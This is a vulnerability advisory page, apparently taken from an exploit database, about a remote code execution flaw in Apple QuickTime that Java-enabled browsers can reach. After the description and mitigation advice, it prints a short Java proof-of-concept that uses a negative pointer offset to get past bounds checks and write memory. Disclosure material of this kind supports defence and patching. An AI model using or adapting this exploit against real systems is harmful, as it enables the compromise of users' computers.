header-logo
Suggest Exploit
vendor:
QuickTime
by:
9.3
CVSS
CRITICAL
Remote Code Execution
94
CWE
Product Name: QuickTime
Affected Version From:
Affected Version To:
Patch Exists: YES
Related CWE:
CPE: a:apple:quicktime
Metasploit:
Other Scripts:
Platforms Tested: Mac OS X, Windows

QuickTime Remote Code Execution Vulnerability

The vulnerability occurs when a Java-enabled browser is used to view a malicious website while QuickTime is installed. Attackers can exploit this vulnerability to execute arbitrary code in the context of the user running QuickTime, potentially leading to remote compromise of the affected computer. Failed exploit attempts may result in denial-of-service conditions. The vulnerability can be exploited through Safari and Mozilla Firefox on Mac OS X, and there are reports suggesting that Firefox on Windows platforms may also be an exploit vector. Reports also mention that Internet Explorer 6 and 7 on Windows XP may be an exploit vector, but this has not been confirmed.

Mitigation:

To mitigate this vulnerability, users are advised to update QuickTime to the latest version available. Additionally, it is recommended to exercise caution when visiting unfamiliar websites and to ensure that Java is disabled in web browsers if not needed.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23608/info

QuickTime is prone to a vulnerability that may aid in the remote compromise of a vulnerable computer.

The issue occurs when a Java-enabled browser is used to view a malicious website. QuickTime must also be installed.

Attackers may exploit this issue to execute arbitrary code in the context of a user running the vulnerable application. Failed exploit attempts will likely result in denial-of-service conditions.

This issue is exploitable through both Safari and Mozilla Firefox running on Mac OS X. Reports indicate that Firefox on Windows platforms may also be an exploit vector.

Reports also indicate that Internet Explorer 6 and 7 running on Windows XP may be an exploit vector, but that a sandboxing feature may interfere with successful exploits. Neither of these points has been confirmed. 

// Initialize QT
QTSession.open();

// Get a handle to anything
byte b[] = new byte[1 /*arbitrary*/];
QTHandle h = new QTHandle(b);

// Turn the handle into a pointer object. The
// large negative value throws off bounds checking.
QTPointerRef p = h.toQTPointer(-2000000000 /*off*/, 10 /*size*/);

// Write to it.
p.copyFromArray(0 /*offset*/, b /*source*/, 0, 1 /*length*/);

Navigation

Suggest Exploit

Services By CQR